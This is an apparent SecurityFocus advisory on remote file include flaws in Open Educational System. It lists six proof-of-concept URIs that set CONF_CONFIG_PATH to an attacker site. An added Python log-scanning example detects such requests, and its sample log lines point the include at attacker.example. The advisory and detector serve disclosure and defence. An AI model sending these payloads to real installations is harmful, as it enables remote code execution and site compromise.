Open Educational System Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://example.com/[OES_path]/includes/lib-account.inc.php?CONF_CONFIG_PATH=attacker site
http://example.com/[OES_path]/includes/lib-group.inc.php?CONF_CONFIG_PATH=attacker site
http://example.com/[OES_path]/includes/lib-log.inc.php?CONF_CONFIG_PATH=attacker site
http://example.com/[OES_path]/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=attacker site
http://example.com/[OES_path]/includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=attacker site
http://example.com/[OES_path]/includes/lib-themes.inc.php?CONF_CONFIG_PATH=attacker site
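A log check built from the URIs above, added here as an example and not part of the original advisory: it flags requests to the six listed include files that supply CONF_CONFIG_PATH in the query string. The access-log format, the sample lines, the verdict names and the premise that legitimate clients never set this parameter are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# File names and parameter name come from the proof-of-concept URIs above.
OES_INCLUDE_FILES = {
    "lib-account.inc.php", "lib-group.inc.php", "lib-log.inc.php",
    "lib-mydb.inc.php", "lib-template-mod.inc.php", "lib-themes.inc.php",
}
PARAM = "CONF_CONFIG_PATH"

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http:, ftp:, php:, ...) or "//".
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]+:|//)", re.I)

def classify(line):
    """Return None, 'param-override' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    parts = target.path.lower().split("/")
    if len(parts) < 2 or parts[-2] != "includes" or parts[-1] not in OES_INCLUDE_FILES:
        return None
    verdict = None
    # parse_qsl percent-decodes, so http%3A%2F%2F... is seen as http://...
    for key, value in parse_qsl(target.query, keep_blank_values=True):
        if key != PARAM:
            continue
        if REMOTE_RE.match(value.strip()):
            return "remote-include"
        # Assumption: a legitimate client never sets this variable itself.
        verdict = "param-override"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2010:10:01:02 +0000] "GET /oes/index.php HTTP/1.1" 200 4312',
    '198.51.100.7 - - [12/Mar/2010:10:02:11 +0000] "GET /oes/includes/lib-mydb.inc.php?CONF_CONFIG_PATH=http://attacker.example/ HTTP/1.1" 200 0',
    '198.51.100.7 - - [12/Mar/2010:10:02:15 +0000] "GET /learn/includes/lib-themes.inc.php?CONF_CONFIG_PATH=http%3A%2F%2Fattacker.example%2Fx HTTP/1.1" 200 0',
    '192.0.2.44 - - [12/Mar/2010:10:05:40 +0000] "GET /oes/includes/lib-log.inc.php?CONF_CONFIG_PATH=../conf/ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Parameters sent in a POST body do not appear in access logs, so this check covers query-string requests only.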


 

Copyright 2010, SecurityFocus